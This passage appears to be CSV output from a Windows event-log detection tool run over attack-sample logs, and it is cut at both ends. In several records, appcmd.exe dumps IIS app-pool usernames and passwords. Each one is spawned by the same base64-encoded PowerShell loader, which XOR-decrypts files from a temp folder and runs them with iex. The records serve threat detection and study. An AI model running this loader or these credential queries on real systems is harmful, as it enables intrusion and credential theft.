""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.121 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.202 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.282 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.352 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.432 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAl